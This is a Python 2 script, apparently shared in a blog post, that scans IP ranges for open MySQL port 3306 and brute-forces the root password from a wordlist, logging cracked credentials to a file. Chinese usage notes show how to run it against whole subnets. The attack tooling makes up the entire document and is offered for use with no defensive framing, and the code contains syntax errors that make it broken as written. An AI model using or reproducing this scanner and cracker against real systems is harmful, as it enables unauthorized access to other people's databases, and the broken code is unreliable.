1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Last Modified by:   Lcy
# @Email: [email protected]
import threading
import argparse
import socket
import Queue
import netaddr
import MySQLdb
import time
import sys
class Mysqlfuzz:
    def __init__(self,addr,tnum):
        self.scanque = Queue.Queue()
        self.tnum = tnum
        self.tmpnum = tnum
        self.lock = threading.Lock()
        self.openlist = []
        if addr.find("-") != -1:
            for ip in netaddr.IPRange(addr.split("-")[0],addr.split("-")[1]): 
                self.scanque.put(ip)
        else:
            for ip in netaddr.IPNetwork(addr).iter_hosts(): 
                self.scanque.put(ip)
        self.qsize = self.scanque.qsize()
        for in range(tnum):
            t = threading.Thread(target=self.ScanPort)
            t.setDaemon(True)
            t.start()
        while self.tmpnum > 0:
            time.sleep(1.0)
        print "[*]:cracking MySQL Password ..."
        with open("pass.txt","r") as file:
            data = file.readlines()
        for ip in self.openlist:
            for line in data:
                self.scanque.put(line.strip())
            for in range(tnum):
                t = threading.Thread(target=self.Crack,args=(ip,))
                t.setDaemon(True)
                t.start()
            while self.scanque.qsize() > 0:
                time.sleep(1.0)
    def Crack(self,ip):
        while self.scanque.qsize() > 0:
            try:
                password = self.scanque.get()
                conn=MySQLdb.connect(host=ip,user='root',passwd=password,db='test',port=3306,connect_timeout=4)
                self.lock.acquire()
                msg = "[+]:%s Username: root Password is: %s" %(ip,password)
                print msg
                output = open('good.txt''a')
                output.write(msg + "\r\n")  
                self.lock.release()
                break
            except:
                pass
    def ScanPort(self):
        while self.scanque.qsize() > 0:
            try:
                ip = self.scanque.get()
                s = socket.socket()
                s.settimeout(4)
                s.connect((str(ip), 3306))
                self.lock.acquire()
                print ip," 3306 open"
                self.openlist.append(str(ip))
                self.lock.release()
            except:
                pass
        self.tmpnum -= 1
if __name__ == "__main__":
    parse = argparse.ArgumentParser(description="mysqlfuzz")
    parse.add_argument('-a','--addr', type=str, help="ipaddress")
    parse.add_argument('-t','--thread', type=int, help="Thread Number",default=100)
    args = parse.parse_args()
    if not args.addr:
        parse.print_help()
        sys.exit(0)
    addr = args.addr
    tnum = args.thread
    Mysqlfuzz(addr,tnum)

需要安装的模块:

pip install netaddr

MySQLdb http://download.csdn.net/detail/weibin0320/6663763

支持ip段爆破和单ip爆破

python fuzz.py -a 192.168.1.1/24 -t 30

python fuzz.py -a 192.168.1.23 -t 30

python fuzz.py -a 192.168.1.1-192.168.1.255 -t 30